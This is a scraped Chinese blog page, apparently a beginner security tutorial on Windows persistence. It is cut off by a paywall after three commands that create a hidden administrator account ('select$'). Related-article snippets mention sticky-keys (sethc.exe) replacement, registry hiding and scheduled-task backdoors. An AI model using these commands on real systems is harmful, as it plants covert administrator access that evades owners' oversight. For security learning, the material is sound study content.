Windows留置后门——隐藏用户+Shift后门

最新推荐文章于 2024-05-31 15:16:05 发布
最新推荐文章于 2024-05-31 15:16:05 发布
阅读量1k 收藏 7
点赞数
分类专栏: 网络安全小白之路 文章标签: windows 安全 安全性测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/G6_12/article/details/131282697
版权

文章目录

前言

后门是攻击者出入系统的通道,惟其如此它隐蔽而危险,攻击者利用后门技术如入无人之境

一、创建隐藏用户

1. 创建用户

1.1、攻击者控制某台机器,并执行添加用户指令

1. net user select$ 123 /add          #创建一个名为select的用户,密码为123,$代表隐藏
2. net localgroup administrators select$ /add      #将select用户的权限提升到管理级别
3. net user select$ /active:yes                    #激活select用户

在这里插入图片描述

此时虽然使用命令行无法看到 select$ 隐藏用户,但是采用其它方法仍旧可以发现select$

最低0.47元/天 解锁文章
锅盖'awa'
关注
  • 0
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
④开启shift后门实验报告
m0_47110032的博客
11-18 943
开启shift后门 实验报告
区建设方案.ppt
04-06
区建设方案.ppt区建设方案.ppt区建设方案.ppt区建设方案.ppt区建设方案.ppt区建设方案.ppt
windows创建隐藏用户后门
diaobusi的博客
06-20 2265
Windows操作系统中,用户系统是用于管理和控制用户访问、权限和资源的一组功能和机制。以下是Windows用户系统的一些关键概念和组成部分:用户账户:Windows用户系统基于用户账户来管理用户访问和权限。每个用户都必须拥有一个唯一的用户账户,用户账户包含了用户的登录名和密码等信息。用户账户可以是本地账户(仅限于本地计算机)或域账户(属于域控制器管理的网络域)。
windows建立隐藏账户
The current road is different, love needs to distinguish between right and wrong
11-18 4791
该方法在网上已有很多相关文章。 测试系统:windows7 一、隐藏账户创建 先查看一下本机存在的账户 新建一个隐藏账户并加入管理员组 (需要管理员权限) net user admin$ admin /add net localgroup administrators admin$ /add #用户名要以$结尾 此时运行“net user” 命令是看不到新建的"admin$" 用户的。 因为这里环境是win7 ,所以进入到控制面板 ...
Windows 权限维持之 Shift 后门
最新发布
Welcome To Myon'Blog !
05-31 457
正常情况下我们连按五次 shift 键会弹出粘滞键粘滞键是电脑使用中的一种快捷键,一般连按五次 shift 会出现粘滞键提示,粘滞键是专为同时按下两个或多个键有困难的人而设计的, 粘滞键开启后,可以先按一个键位,再按另一键位,而不是同时按下两个键位,方便某些因身体原因而无法同时按下多键的人。sethc.exe 就是 Windows 下的粘滞键,它的位在 C:\Windows\System32\sethc.exe。
Windows权限维持之账户隐藏
Fly_鹏程万里
10-20 655
windows操作系统中攻击者可以通过创建隐藏账户来实现权限维持的目的,由于创建的隐藏账户无法通过命令行或者图形化界面的方式被检索到,所以此类权限维持的方式极为隐蔽,本篇文章将对隐藏账户的创建方式和检索方式进行复现。
网络安全入门学习练手——windows创建隐藏用户
p36273的博客
05-19 5123
(例如使用D盾查杀)
内网渗透-windows持久性后门
weixin_72849553的博客
02-05 1211
前不久进行了一次钓鱼,对方电脑是win7系统,加上有杀软,最后因为电脑关机,失去了权限。整理下从木马上线到快速建立后门的方法。本次只写出了一部分建立持久性后门的方法,还有许多方法没有进行演示,大部门方法都是对注册表进行更改,无法绕过杀软。
win7隐藏其他用户
netlinking的专栏
02-21 483
打开注册表编辑器(在“开始”-“运行”中输入regedit并回车 ) 定位到以下位:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon,在 Winlogon下手动添加 SpecialAccounts\UserList 这个子项。在UserList下,再新建一个DWORD值(新建时注意选32位的,不
Windows Server 创建隐藏账户
qq_61861243的博客
10-05 2219
Windows Server 创建隐藏账户
Windows后门--教程(二)——Windows计划任务后门
W小哥
03-15 4432
一、Windows计划任务后门介绍 计划任务是经常被攻击者拿来利用的控制点,计划任务可以让目标主机在特定的时间执行我们预先准备的后门程序从而帮助我们进行权限维持。 二、Windows计划任务后门-教程 前提条件: 假设在攻击的过程中通过利用各种getshell,已经拿到目标服务器administrator权限 环境: windows Server2012 IP: 192.168.226.128 2.1 利用MSF生成一个EXE类型的后门木马 2.2 创建计划任务 2.3 监听返回的shell 三、Win
Windows后门--教程(四)——Windows启动项后门
W小哥
03-16 6553
一、Windows启动项后门介绍 Windows启动项后门也是攻击者常用的权限维持方式,大体上可以分为两种。一种是重启电脑时自启动后门程序实现权限维持;另一种是点击某应用、服务、程序时自启动后门程序实现权限维持。 二、Windows启动项后门-教程 前提条件: 假设在攻击的过程中通过利用各种getshell,已经拿到目标服务器administrator权限 靶机: windows Server2012 IP: 192.168.226.128 攻击机: kali IP: 192.168.226.131 2.1
静脉针输液技术PPT课件
04-14
静脉针输液技术,静脉针输液技术课件,静脉针输液技术PPT
担保法PPT课件 权.ppt
06-16
担保法PPT课件
尿管PPT医学课件.ppt
05-10
尿管,尿管课件,尿管PPT
静脉针和picc的感染控制ppt课件.ppt
08-08
静脉针和picc的感染控制,静脉针和picc的感染控制PPT,静脉针和picc的感染控制课件
Windows隐藏账户
CC210231的博客
04-10 4101
黑客在进行渗透测试的时候,如果进入了目标系统,往往会在系统上创建一个高权限的账户,作为后门,方便以后进入系统,此时就需要对创建的账户进行隐藏,避免被系统管理员发现 1.先介绍一下在Windows系统中一般创建隐藏账户的方法: 使用cmd命令: net user username$ /add 并使用net localgroup命令将创建的隐藏账户加入管理员组 使用net user 命令查看不到刚刚创建的隐藏账户 但是在“计算机管理”中的“本地用户和组”中是可以查看到的,非常容.
windows操作系统后门
m0_68353775的博客
10-04 683
影子账户   创建隐藏账户的方式: 创建一个隐藏账户"net user test$ password /add",隐藏账户无法使用"net user"命令查看,但是可以在"本地用户和组"里面查看。 打开注册表"HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/Names"找到创建的隐藏账户(test$),在这个注册表里面可以看见test$账户的类型,同样可以查看计算机Administr
windows shift backdoor(windows shift 后门)
热门推荐
正在成为 code ape
01-28 1万+
This backdoor allows you to run command prompt (cmd.exe) with system privilege from the Windows 7 login screen. So with a system privilege command prompt in your hands, you can actually do a lot of st...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值